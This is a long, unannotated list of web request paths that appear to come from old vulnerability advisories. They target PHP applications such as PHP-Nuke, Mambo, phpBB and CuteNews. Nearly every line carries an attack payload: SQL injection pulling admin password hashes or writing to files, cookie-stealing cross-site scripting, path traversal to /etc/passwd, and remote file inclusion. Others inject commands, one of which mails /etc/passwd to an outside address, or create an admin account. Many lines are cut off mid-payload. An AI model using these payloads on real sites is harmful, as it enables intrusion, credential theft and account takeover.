/url] 
/index.php?showtopic='><script>window.open
/?showtopic='><script>alert(window.document.url)</script><plaintext> 
/auth.inc.php?admin=JyBPUiAxPTEgSU5UTyBPVVRGSUxFICcvY29tcGxldGUvcGF0aC9Vc2VyVGFibGUudHh0OjE=
/mambo/banners.php?op=click&bid=100 UNION select password from mos_users where 1=1 into outfile 'c
/mambo/emailfriend/emailarticle.php?submit=submit&email=example@example.com&youremail=example@example.com&id=100 UNION select username,email,password from mos_users where id=1
//localhost/mambo/contact.php?op=sendmail&text=this is spam&from=none&name=Admin&email_to=example@example.com&sitename=www.example.com 
/powerslave,id,10;,nodeid,,_language,uk.html
/index.php?topic=te'st/[SQL INJECTION CODE]
/forum/viewtopic.php?forum=1&showtopic=1'0/[SQL INJECTION
/staticpages/index.php?page=test'test/[SQL INJECTION CODE]
/filemgmt/visit.php?lid=1'1'0/[SQL INJECTION CODE]
/filemgmt/viewcat.php?cid='6/[SQL INJECTION CODE]
/comment.php?type=filemgmt&cid=filemgmt-1'70/[SQL INJECTION
/comment.php?mode=display&sid=filemgmt-XXX&title=[SQL
/filemgmt/singlefile.php?lid=17'/0/[SQL INJECTION CODE] 
/faqman/index.php?op=view&t=518">[XSS ATTACK CODE]
/filemgmt/brokenfile.php?lid=17'/%22%3[XSS ATTACK CODE]
/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile'c
/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile'/var/www/html/dcpad.txt
/dcp/advertiser.php?adv_logged=1&username=1&password=' 
/dcp/lostpassword.php?action=lost&email=fake' or 1=1--' 
/search.html?cat=0&keys=<script>alert("hello")</script><script>alert.document.cookie)</script> 
/./.././../mpnews.ini 
/index.php?cat=100)%09or%090=0%09or%09(0=1 
/index.php?do=ext&page=http
/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http
/search.php?zoom_query=<script>alert("hello")</script><script>alert("hello")</script> 
/bytehoard/index.php?infolder=../../../../ 
/deskpro_v1/faq.php?cat=45'
/deskpro_v1/faq.php?article=105'
/deskpro_v1/view.php?ticketid=1'&ticket_pass= 
/path/include/config.inc.php?lvc_include_dir=http
/~path/index.php?top_message=<script>alert(document.cookie)</script>
/~path/index.php?top_message=<h1>OWNED?%20*g*</h1>
/script>
/[path]/index.php?faction=reply&thread_id=[ID OF THE THREAD TO READ]&forum_id=[ID OF FORUM]&sid=[your sid]
/index.php?vo="><script>alert(document.cookie);</script>
/include.php?path=contact.php&contact_email="><script>alert(123);</script> 
/openautoclassifieds/friendmail.php?listing=<
/photos/showimages.php?dir=<iframe%20src="C
//photos/showfullimage.php?dir=[dir name][spc]St[spc]Clair&image=<h1>hello</h1> 
/profile.php?mode=viewprofile&u='[sqlcode]
/phpwebfilemgr/index.php?f=../../../ 
/rolis_book_path/insert.inc.php?path=http
/index.php?dir=<script>malicious_code</script> 
/cutenews/index.php?debug 
/banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'
/banners.php?op=Change&cid=-1&bid=100&url=HTTP
/index.php?path=<script>alert(document.domain)</script> 
/index.php" method="post">
/index.php?option=articles&task=viewarticle&artid=5%20UNION%20somequery 
/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
/index.php?method=`
/index.php?a=lostpw&set=1&id=`
/index.php?a=lostpw&set=1&session_id=` 
/?osCsid="><iframe src=http
/index.inc.php?PATH_Includes=http
/Members/index.inc.php?PATH_Includes=http
/Members/root/index.inc.php?PATH_Includes=http
/Include/functions_message.php?PATH_Includes=
/
/Include/Start.php?inc_path=http
/Include/functions_folder.php?PATH_Includes=
/
/Include/functions_hacking.php?PATH_Includes=
/&itemID=usershow
/modules/mylinks/myheader.php?url=javascript
/modules/mylinks/myheader.php?url="><script>alert(document.cookie)</script> 
/default.php?cPath=[MID]&sort=5a&page=1&action=buy_now&products_id=[PID][JNK]
/default.php?manufacturers_id="><iframe src=http
/forum/email.php?forum_contact="><script>alert(document.domain);</script> 
/shoutbox/viewshoutbox.php?error="><script>alert(document.cookie);</script> 
/forums/privmsg.php?mode=""><script>alert(document.cookie);</scrip
/phpBB/privmsg.php?mode=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C 
/kb/index.php?page=http
/imageview.php?desc=</title><script>alert(document.cookie)</script>
/entryadmin.php?error=1&errormessage=<script>alert('xss')</script> 
/board.php?FID=%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/php-nuke/modules.php?name=Surveys&pollID=a'[sql_code_here] 
/index.php?page=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E 
/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
/php-ping.php?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21 
/wp-content/themes/clockstone/theme/functions/upload.php" method="post">
/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http
/athenareg.php?pass=%20;whoami 
/includes/hotnews-engine.inc.php3?config[header]=http
/includes/hnmain.inc.php3?config[incdir]=http
/includes/hnmain.inc.php3?config[incdir]=http
/shop/search.php?search=%3Cscript%3Ealert(document.domain);%3C/script%3E
/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http
/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http
/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http
/phpgedview_folder/admin.php?action=phpinfo
/manpage/index.php?command=/etc/resolv.conf
/module.php?link=http
/phpix/index.phtml?mode=view&album=`cat%20/etc/passwd%20|%20mail%20someone@somewhere.com`&pic=A-10.jpg&dispsize=640&start=0
/phpix/index.phtml?mode=view&album=Sample+Album&pic=A-10.jpg&dispsize=`cat%20/etc/passwd%20|%20mail%20someone@somewhere.com`&start=0
/phpix/index.phtml?mode=view&album=Sample+Album&pic=`cat%20/etc/passwd%20|%20mail%20someone@somewhere.com`&dispsize=640&start=0
/gallery/init.php?HTTP_POST_VARS=xxx 
/modules/newbb/viewtopic.php?topic_id=14577&forum=2"><script>alert(document.cookie);</script>
/modules/newbb/viewtopic.php?topic_id=14577"><script>alert(document.cookie);</script>&forum=2 
/index.php?kietu[url_hit]=http
/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=../../../../../../etc/passwd
/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http
/browser.php?directory=[ATTACKER_SPECIFIED_PATH]
/config/fonctions.lib.php?rep=http
/derniers_commentaires.php?rep=http
/admin.php?rep=http
/_admin/
/_admin/list_all.php?folder=../
/_admin/upload.php 
/index.php?show=/etc/passwd 
/modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20
/modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SEL
/modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION
/modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20
/modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20
/modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1
/modules.php?name=Downloads&d_op=viewdownload&cid=-1%20
/modules.php?name=Downloads&d_op=modifydownloadrequest&
/modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20
/modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20
/modules.php?name=Downloads&d_op=viewdownloadcomments&
/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1
/modules.php?name=Sections&op=listarticles&secid=-1%20UNION
/modules.php?name=Sections&op=listarticles&secid=-1%20UNION
/modules.php?name=Sections&op=printpage&artid=-1%20UNION%20
/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20
/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20
/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00 
/directory/showproduct.php?product=[query]
/directory/showcat.php?cat=[query]
/index.php?option=content&task=view&id=1&Itemid="><script>alert(document.domain);</script>
/modules.php?name=Reviews&rop=postcomment&title=%253cscript>alert%2528document.cookie);%253c/script>
/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http
/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http
/directory/calendar_download.php?calendar=[query]
//admin.html
/forum/register.php?s=60b7ac47d0eba9853b6e36a3b18924bc&s=&do=register&url=AK%22%20style%3D%22background
/forum/search.php?do=process&showposts=0&query=<!-- / main error message --></p></p></blockquote>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert('XSS')</script><plaintext>
/forum/search.php?do=process&showposts=0&query=<script>alert('XSS')</script>
/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http
/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http
/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,nul
/directory/shop.php?cat=[query]
/directory/lite/shop_by_brand.php?cat_manufacturer=[query]
/directory/listing.php?id=[query]
/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print 
/owls/workshop/glossary.php?editfile=../../../../../../../../../../../../../../../etc/passwd
/owls/workshop/newmultiplechoice.php?edit=1&editfile=../../../../../../../../../../../../../../../etc/passwd
/owls/glossaries/index.php?file=/etc/passwd 
/owls/readings/index.php?filename=/etc/passwd
/owls/multiplechoice/resultsignore.php?filename=/etc/passwd
/functions.php?clang=../../../[existing_file]
/xmb18sp2/u2uadmin.php?uid=x"><%73cript>alert(document.cookie);</%73cript>
/xmb18sp2/editprofile.php?user=x"><%73cript>alert(document.cookie);</%73cript>
/xmb18sp2/forumdisplay.php?fid=1&tpp=x
/xmb18sp2/forumdisplay.php?fid=1&ascdesc=x
/path_of_optx/includes/header.php?systempath=http
/phptest.php
/?c='><script>alert(window.document.url)</script><plaintext>
/?act=SR&f='><script>alert(document.cookie)</script>
/?showuser='><script>alert(document.cookie)</script>
/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert
/forum/index.php?board=1;action=modify2;msg=2;threadid=2;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;subject=hola;message=hola;waction=deletemodify;posti
/forum/index.php?board=1;action=modify;threadid=1;quote=1;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12)+UNION+SELECT+3,null,2,concat(passwd,%27-%2
/forum/index.php?board=1;action=modify2;delAttach=on;attachOld=../../../../d
/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~">&lt;/textarea&gt;<script>alert('XSS')</script>
/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~">&lt;/textarea&gt;--><script>alert('XSS')</script>
/admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~">&lt;/textarea&gt;<script>alert('XSS')</script>
/admin.php?action=files&expand="><script>alert('XSS')</script>
/admin.php?action=files_cat_delete&id="><script>alert('XSS')</script>
/admin.php?action=files_check&catid="><script>alert('XSS')</script>
/admin.php?action=newslogo_upload&"><script>alert('XSS')</script>
/user/tools_cgicheck2.php?dir=3D&file=3D%20./x%20|/bin/cat%20/etc/passwd
/nuke71/modules.php?name=Recommend_Us&op=SiteSent&fname=>[xss code here]
/nuke71/modules.php?name=Downloads&d_op=TopRated&ratenum=>[xss code here]&ratetype=x
/phpNukeDirectory/modules/4nalbum/public/displaycategory.php?basepath=http
/phpNukeDirectory/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null%20FROM%20nuke_authors/*
/phpNukeDirectory/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,aid,2,null,null,null%20FROM%20nuke_authors/*
/phpNukeDirectory/modules/4nalbum/public/nmimage.php?z=[xss code here]
/forumdisplay.php?f=[VID]&page=[INT]&sort=lastpost&order=[XSS]
/showthread.php?t=[VID]&page=[INT][XSS]
/index.php?return=[XSS]
/index.php?mos_change_template=[XSS]
/index.php?option=content&task=view&id=[SQL]&Itemid=[VID]
/index.php?option=content&task=category&sectionid=[VID]&id=[SQL]&Itemid=[VID]
/index.php?option=content&task=category&sectionid=[VID]&id=[SQL]&Itemid=[VID]
/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala@hot.ee&add_radminsuper=1[/img]
/vcard/admin/uninstall.php
/vcard/admin/uninstall.php?step=2
/nuke71/error.php?newlang=foobar
/nuke71/error.php?pagetitle=[xss code here]
/nuke71/error.php?error=>[xss code here]
/error.php" method="POST">
/private.php?&action=newmessage&userid=[UID]&forward=[XSS]
/nuke70/modules.php?name=MS_Analysis&file=index&op=MSAnalysisGeneral&screen=>[xss_code_here]&overview=1&sortby=
/nuke70/modules/MS_Analysis/title.php?module_name=>[xss_code_here]
/nuke70/modules.php?name=MS_Analysis&file=index&op=MSAnalysisGeneral&screen=3&overview=1&sortby=>[xss_code_here]
/nuke70/modules.php?name=MS_Analysis&file=index&op=MSAnalysisGeneral&screen=13&overview=>[xss_code_here]&sortby=
/search?q=Maty+Scripts%27UNION SELECT pwd from nuke_authors where name%3d%27God%27 AND IF(mid(pwd,1,1)%3d3,benchmark(150000,md5(1337)),1)/*"
/showgallery.php?ppuser=-2'%20UNION%20SELECT%200,email,
/myhome.php?action=readmsg&id=1[SQL CODE] 
/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=foobar
/nuke71/blocks/block-Calendar.php
/nuke71/blocks/block-Calendar1.php
/nuke71/blocks/block-Calendar_center.php
/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=[xss code here]
/nuke71/modules.php?op=modload&name=Kalender&file=index&type=view&eid=-1%20UNION%20select%20null,aid,null,pwd,null,null,null,null,null,null,null,null%20%20FR
/azdlite/index.php?l=en"><script>alert(document.cookie);</script>
/azdlite/view.php?l=&id=00001<script>alert(document.cookie);</script> 
/img/wiki_up/filenamehere
/index.php?user_langue=../../../../../file/to/view
/php/note/note_overview.php?id=1
/nuke71/modules.php?name=Private_Messages&file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox
/nuke71/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
/query.php?page=2&order=severity.sort_order&sort=[SQL]
/query.php?page=2&order=[SQL]
/query.php?page=[SQL]
/query.php?op=delquery&queryid=[SQL]&form=simple
/query.php?projects=[SQL]&op=doquery
/bug.php?op=vote&bugid=[SQL]
/bug.php?op=viewvotes&bugid=[SQL]
/user.php?op=delvote&bugid=[SQL]
/bug.php?op=show&bugid=[XSS]
/bug.php?op=vote&bugid=[XSS]
/bug.php?op=viewvotes&bugid=[XSS]
/bug.php?op=add&project=[XSS]
/query.php?page=2&order=severity.sort_order&sort=[XSS]
/query.php?page=2&order=[XSS]
/query.php?page=[XSS]
/query.php?op=delquery&queryid=[XSS]&form=simple
/query.php?projects=[XSS]&op=doquery
/user.php?op=delvote&bugid=[XSS]
/cp/email/composeBody?function=new&to=attacker@example.com&subject=I
/attackerSpecified.html')">
/[Gemitel folder]/html/affich.php?base=http
/index.php?modname=saf&id=4
/album_portal.php?phpbb_root_path=http
/postnuke0726/modules.php?op=modload&name=phprofession&file=index&offset=foobar
/postnuke0726/modules/phprofession/upload.php
/postnuke0726/modules.php?op=modload&name=phprofession&file=upload&jcode=[xss code here]
/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body>[xss code here]
/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body%20onload=alert(document.cookie);>
/fullnews.php?id=<script>alert(document.cookie);</script>
/nuke72/index.php?foobar%27,IF(ord(mid(USER(),1,1))%3d114,benchmark(500000,md5(1337)),1),2)/*
/nuke72/index.php?foo=bar%20U/**/NION%20SELECT%20ALL%20FROM%20WHERE
/nuke72/index.php?foo=bar%20UNION%20SELECT%20ALL%20FROM%20WHERE
/nuke72/admin/modules/blocker_query.php?target=foobar.com">[xss code here]
/nuke72/admin/modules/blocker_query.php?target=foobar.com&queryType=all&portNum=foobar[xss code here]
/member.php?action=login&redirect=[XSS]
/myhome.php?action=newmsg&to=blah[XSS]
/post.php?action=mail&TID=1[XSS]
/index.php?redirect=[XSS]
/board.php?FID=1[SQL]
/member.php?action=list&page=1&sortorder=[SQL]
/member.php?action=list&page=1&sortorder=username&perpage=[SQL]
/member.php?action=passwdsend&resetid=blah&id=2[SQL]
/search.php?&sortby=dateline&sort=DESC&q=open&forums%5B[SQL]%5D
/post.php?action=edit&page=1&PID=1[SQL]
/post.php?action=post&FID=1[SQL]
/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
/modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1
/modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
/www.example.com/forum/myhome.php?action=readmsg&id=[message_id]&box=inbox
/mail/src/compose.php?mailbox=">&lt;script&gt;window.alert(document.cookie)&lt;/script&gt;
/help.php?text={XSS}
/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);> 
/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../.. 
/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http
/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http
/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http
/nuke72/modules/coppermine/themes/maze/theme.php?THEME_DIR=http
/index.php?topic=12345.0&alert('cookie
/forums.php?forum_id=[VID]&limit=25%3Ciframe%3E
/forums.php?forum_id=[VID]&topic_id=[VID]&limit=15%3Ciframe%3E
/users.php?action=&limit=100%3Ciframe%3E
/users.php?action=view&user_id=[VID]%3E%3Ciframe%3E
/forums.php?action=post&forum_id=[VID]%3E%3Ciframe%3E
/forums.php?action=search&search_id=[VID]&limit=25%3E%3Ciframe%3E
/users.php?action=email&user_id=%3E%3Ciframe%3E
/users.php?action=view&user_id=[VID]%3E%3Ciframe%3E
/forums.php?forum_id=[VID]%3E%3Ciframe%3E
/forums.php?forum_id=[VID]&topic_id=[VID]&limit=%3E%3Ciframe%3E
/forums.php?action=post&forum_id=[VID]&topic_id=[VID]%3E%3Ciframe%3E
/news.php?news_id=[VID]%3E%3Ciframe%3E
/forums.php?forum_id=[VID]&topic_id=[VID]%3E%3Ciframe%3E
/admin/page.php?action=delete&page_id=[VID]
/admin/news.php?action=delete&news_id=[VID]
/admin/user.php?action=delete&user_id=[VID]
/admin/images.php?action=delete&image_id=[VID]
/admin/forums.php?action=words&subaction=delete&word_id=[VID]
/admin/forums.php?action=flag&subaction=delete&flag_id=[VID]
/admin/forums.php?action=xcode&subaction=delete&xcode_id=[VID]
/nuke72/modules.php?name=NukeJokes&func=CatView&cat=[xss code here]
/nuke72/modules.php?name=NukeJokes&func=JokeView&jokeid=[xss code here]
/nuke72/modules.php?name=NukeJokes&file=print&jokeid=-1/**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
/guides/index.php?lang=0&CODE=02&id=1[SQL]
/guides/index.php?lang=0&CODE=01&id=1[SQL]
/guides/index.php?lang=0&CODE=14&id=1[SQL]
/guides/admin.php?s=[SOMETHING]&act=own
/sites/guides/admin.php?s=[SOMETHING]&act=admin&CODE=01
//forums.example.com/admincp/index.php?loc=http
/nuke73/index.php?modpath=ftp
/nuke73/index.php?modpath=//attacker_ip/share_name/
/htmlarea/popups/explorer.php?wdir=/../../../../../../../../../../etc
/e107_plugins/log/log.php?referer=code<br>goes<here>&color=24&eself=http
/print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1 
/e107_0615/usersettings.php?avmsg=[xss code here]
/admin/case/case.adminfaq.php/admin.php?op=FaqCatGo
/admin/admin.php/index.php
/admin/modules/blocks.php/admin.php 
/mail/mmex.php?Settings=http
/[non-existant request]
/ssi.php?a=out&type=xml&f=0)[SQL-INJECTION] 
/nuke73/modules.php?name=Encyclopedia&op=terms&eid=1&ltr=[xss code here]
/nuke73/modules.php?name=Encyclopedia&file=search&eid=[xss code here]
/nuke73/modules.php?name=Encyclopedia&file=search&query=f00bar&eid=[xss code here]
/nuke73/modules.php?name=Encyclopedia&op=content&tid=774&page=2&query=[xss code here]
/nuke73/modules.php?name=Reviews&rop=Q&order=[sql injection code here]
/nuke73/modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=999999999999999999999999 
/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f003@bar.org&reviewer=f00bar&url_title=foobar&url=[xss code here]
/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f003@bar.org&reviewer=f00bar&cover=[xss code here]
/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f00@bar.org&reviewer=f00bar&rlanguage=[xss code here]
/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f00@bar.org&reviewer=f00bar&hits=[xss code here]
/nuke73/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=f00@bar.org&reviewer=[xss code here]
/nuke72/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=f00@bar.org&text=f00%253c/textarea>%253cscript>alert%2528document.cookie);%253
/nuke73/modules.php?name=Reviews&rop=savecomment&uname=[xss code here]&id=8&score=9
/hyper/ssi.php?a=out&type=xml&f=<script>alert("ALOooooooooo");</script>
/pivot/modules/module_db.php?pivot_path=http
/chat/usersL.php3?L=russian&R='[SQL]
/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/*
/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/*
/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20email,null,null,null%20FROM%20%20c_reg_users%20/*
/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=[FILE]%00
//[www.example.com/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=/../../../../../../etc/passwd%00
/chat/admin.php3?From=admin.php3&What=[FILE]%00&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=1
/chat/admin.php3?From=admin.php3&What=/../../../../../../etc/passwd%00&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=1
/?rawURL=&lt;script&gt;javascript
/nuke73/modules.php?name=Journal&file=friend&jid=2&yun=[xss code here]
/nuke73/modules.php?name=Journal&file=friend&jid=2&ye=[xss code here]
/nuke73/modules.php?name=Journal&file=add&filelist[]=[xss
/nuke73/modules.php?name=Journal&file=modify&filelist[]=[xss
/nuke73/modules.php?name=Journal&file=delete&jid=[xss
/nuke73/modules.php?name=Journal&file=comment&onwhat=[xss
/nuke73/modules.php?name=Journal&file=commentsave&rid=[xsscode here]
/nuke73/modules.php?name=Journal&file=commentkill&onwhat=1
/nuke73/modules.php?name=Journal&file=savenew&title=f00bar
/nuke73/modules.php?name=Journal&file=search&bywhat=aid&exact=1
/newreply.php" name="vbform"
/newsletter/admin.php?f=list_user&uname=test&ulevel=1 
/example1.php?subaction=showfull&id=<script>alert(document.cookie);</script>
/example2.php?subaction=showfull&id=<script>alert(document.cookie);</script> 
/show_archives.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&ucat=&&archive=&start_from=&ucat=&
/modules.php?name=gallery&files=/../../../ 
/jaws/index.php?gadget=../../../../../../../../../../etc/passwd%00&path=/etc
/jaws/index.php?gadget=[a valid gadget]&action=<b>bold letter</b>
/jaws/index.php?gadget=[a valid gadget]&action=<script>alert('Colombia Rulx!!');</script>
/help.php?file={XSS} 
/show_news.php?subaction=addcomment&name=UserName&comments=http
/printview.php?t={existing_topic's_id}&order_sql=UNION%20
/forum/include/common.php?pun_root=http
/laytonhelpdesk/editcommentenduser.asp?sys_comment_id=1'
/install.php
/stadtportal-path/index.php?site=http
/html/modules.php?0p=modload&name=Reviews&file=index&req=showcontent&id=1&title=%253cscript>alert%2528document.cookie);%253c/script>
/phorum5/search.php?12,search=vamp,page=1,match_type=ALL,
/news/index.php?id=signup&username=example&email=user@example.com&password=password&icon=&le=3&timeoffset=1
/mod.php?mod=publisher&op=search&query=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/phpnuke/admin.php?op=deladmin2&del_aid=dudul
/moodle/mod/forum/post.php?reply=%3Cscript%3Ealert(document.cookie);%3C/script%3E
/blog/blog_exec.php?action=remove_blog&blogid=<script>alert(document.cookie);</script>
// www.example.com
// www.example.com
/show_archives.php?archive=[code]&subaction=list-archive&
/cacti/cmd.php and the command will be
/fusion/fusion_admin/db_backups/backup_2004-08-17_1845.sql
/mantis/core/bug_api.php?t_core_dir=http
/login_page.php?return=[XSS]
/signup.php?username=user&email=[XSS]
/login_select_proj_page.php?ref=[XSS]
/login_select_proj_page.php?ref=%22%3E[XSS]
/view_all_set.php?type=1&reporter_id=5031&hide_status=80<script>alert('hi')</script> 
/demo/out/out.ViewFolder.php?folderid=3 or 1=1
/mydms/op/op.ViewOnline.php?request=4
/page.php?xPage=<SCRIPT>alert(document.cookie)</SCRIPT> 
/modules.php?name=Photo_A_Day&action=single&pad_selected=44%20UNION%20SELECT%20< script>alert(document.cookie);</script> 
/egroupware/index.php?menuaction=calendar.uicalendar.day&date=20040701"><script>alert(document.cookie)</script 
/[path]/index.php?cat_select=[XSS]
/[path]/index.php?cat_select=[XSS]&show=[XSS] 
/cutenews/index.php?mod=[XSS CODE]
/cutenews/index.php?mod=<script>alert(document.cookie)</script>
/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script>
/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font>
/becommunity/community/index.php?pageurl=[injection URL]
/becommunity/community/index.php?from_market=Y&pageurl=[injection URL]
/index.php?module=subjects&func=listpages&subid=[SQL]
/index.php?module=subjects&func=viewpage&pageid=[SQL]
/index.php?module=subjects&func=listcat&catid=[SQL]
/bemarket/shop/index.php?pageurl=viewpage&
/becommunity/board/f_down.php?dn_path=
/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/*
/index.php?option=com_remository&Itemid=[id]&func=selectfolder&filecatid=[id]%20and%201=0%20union%20all%20select%201,2,3,4,username,6,password,8,9
/index.php?option=com_content&task=view&id=15&Itemid=2&limit=1">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&limitstart=1
/includes/Cache/Lite/Function.php?mosConfig_absolute_path=http
/file/file_overview.php?link_id=1005'asdf 
/app_new.php?t=200408240<script>alert(document.cookie)</script>
/include/livre_include.php?no_connect=lol&chem_absolu=http
/bb_lib/checkdb.inc.php?libpach=http
/store/index.php?cat_id=1 or 1=1
/calendar.php?year=2004&month=[XSS code here]&day=01
/calendar.php?year=2004&month=09&day=[XSS code here]
/index.php?page=annoucements&cid=[XSS code here]
/annoucement.php?aid=8&cid=[XSS code here]
/news.php?nid=34&cid=[XSS code here]
/contents.php?cid=[XSS code here]
/cp/render.UserLayoutRootNode.uP?uP_tparam=utf
/cp/render.UserLayoutRootNode.uP?uP_tparam=utf&utf
/index.php?op=buscar&query=<script language=javascript>window.alert(document.cookie);</script>
/index.php?op=buscar&query=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
/index.php?op=userinfo&nick=<script language=javascript>window.alert(document.cookie);</script>
/index.php?op=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2FattackerControlledDirectory/attackerScript.php
/img]
/serendipity/exit.php?url=DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb
/wiki.php/<script>alert("XSS Vulnerability exists")</script> http
/goollery/viewpic.php?id=2&conversation_id=ffee00b71f3931a&btopage=<form%20action="http
/goollery/viewalbum.php?conversation_id=ffee00b71f3931a&page=<form%20action="http
/goollery/viewalbum.php?conversation_id=ffee00b71f3931a&page=<body>XSS%20poW@!!</body>&sess=daf5c642ade1162f15c4eb4b7e89da17
/view_entry.php?id=41972"><img%20src=http
/view_d.php?id=657"><img%20src=http
/usersel.php?form=editentryform.elements[20];%0d%0aalert(document.cookie);//&listid=20&users=demo,demo1,demo2
/datesel.php?form=editentryform.elements[20].rpt_day.selectedIndex%20=%20day%20-%201;alert(document.cookie);//"><img%20src=http
/datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript
/includes/trailer.php?user="><img%20src=http
/includes/styles.php?FONTS=asdf}%0A--></style><script>alert(document.cookie)</script>
/login.php?return_path=%0d%0aContent-Length
/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true
